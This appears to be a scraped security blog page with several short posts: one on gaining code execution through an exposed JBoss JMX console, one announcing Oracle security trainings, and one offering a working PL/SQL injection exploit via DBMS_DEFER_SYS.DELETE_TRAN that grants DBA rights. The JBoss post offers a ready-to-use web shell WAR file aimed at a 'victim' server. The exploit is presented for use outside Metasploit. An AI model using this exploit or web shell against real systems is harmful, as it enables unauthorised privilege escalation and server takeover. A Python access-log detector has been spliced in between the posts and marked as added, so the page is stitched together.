www.notsosecure.com

From Pentesters To Pentesters

During internal infrastructure assessments, it's common to find unrestricted access to the JBoss JMX console. This web interface allows deployment of arbitrary WAR files. Here is an excellent article describing the process:
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf

Here is a WAR file, ready to use: cmd.war (zipped)
Once deployed, check for this file on the vulnerable JBoss instance: http://victim:8080/cmd/cmd.jsp

Happy Hacking :)
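
For the defending side, the sequence described above (anonymous access to the JMX console, then a request for a freshly deployed JSP) is visible in the application server's HTTP access log. The following is an added example, not code from the original post: it assumes access logging in common log format is enabled, the function name is hypothetical, and the log lines are constructed.

```python
import re

# Common log format: host ident user [time] "METHOD path PROTO" status size
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation addresses), not from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2009:10:01:02 +0000] "GET /jmx-console/ HTTP/1.1" 200 48211
192.0.2.10 - - [19/Nov/2009:10:03:40 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1532
192.0.2.10 - - [19/Nov/2009:10:04:05 +0000] "GET /cmd/cmd.jsp HTTP/1.1" 200 312
192.0.2.77 - admin [19/Nov/2009:10:05:00 +0000] "GET /jmx-console/ HTTP/1.1" 200 48211
192.0.2.55 - - [19/Nov/2009:10:06:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 0
192.0.2.55 - - [19/Nov/2009:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 900
"""


def find_console_exposure(log_text, console_prefix="/jmx-console"):
    """Return (kind, host, path) findings for anonymous console use.

    console-open:      console page served (2xx) with no authenticated user
    console-change:    POST to the console accepted with no authenticated user
    jsp-after-console: JSP served to a host that earlier used the console anonymously
    """
    findings = []
    console_hosts = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line
        path = m["path"].split("?", 1)[0]  # ignore the query string
        anonymous = m["user"] == "-"
        served = m["status"].startswith("2")
        if not (anonymous and served):
            continue  # authenticated or rejected requests are not exposure
        if path.startswith(console_prefix):
            console_hosts.add(m["host"])
            kind = "console-change" if m["method"] == "POST" else "console-open"
            findings.append((kind, m["host"], path))
        elif path.endswith(".jsp") and m["host"] in console_hosts:
            findings.append(("jsp-after-console", m["host"], path))
    return findings


if __name__ == "__main__":
    for finding in find_console_exposure(SAMPLE_LOG):
        print(*finding)
```

Any console-open finding means the console is reachable without credentials and should be restricted or removed, whether or not a deployment followed.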

I will be conducting two one-day Oracle Security Trainings in November and December.

November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html

At OWASP India, I will also be giving a talk. The talk is titled ‘Hacking Oracle From Web’. Here I will discuss some advanced techniques for exploiting SQL/PLSQL injections targeting an Oracle back-end, along with the security problems with other Oracle components such as Oracle Application Servers, Application Portal, Secure Back-up, etc.

December 14th 2009:
Venue: 7Safe, Sawston, Cambridge, U.K.
Course Agenda/Outline:
http://7safe.com/oracle_database_security_training_course.htm

The exploit for this vulnerability is in Metasploit, but I could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008.

So, if you need to use it outside Metasploit, here it is:

DECLARE
  D NUMBER;
BEGIN
  D := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  DBMS_DEFER_SYS.DELETE_TRAN('aaaaaa','a'' and dbms_sql.execute('||D||')=1--');
end;
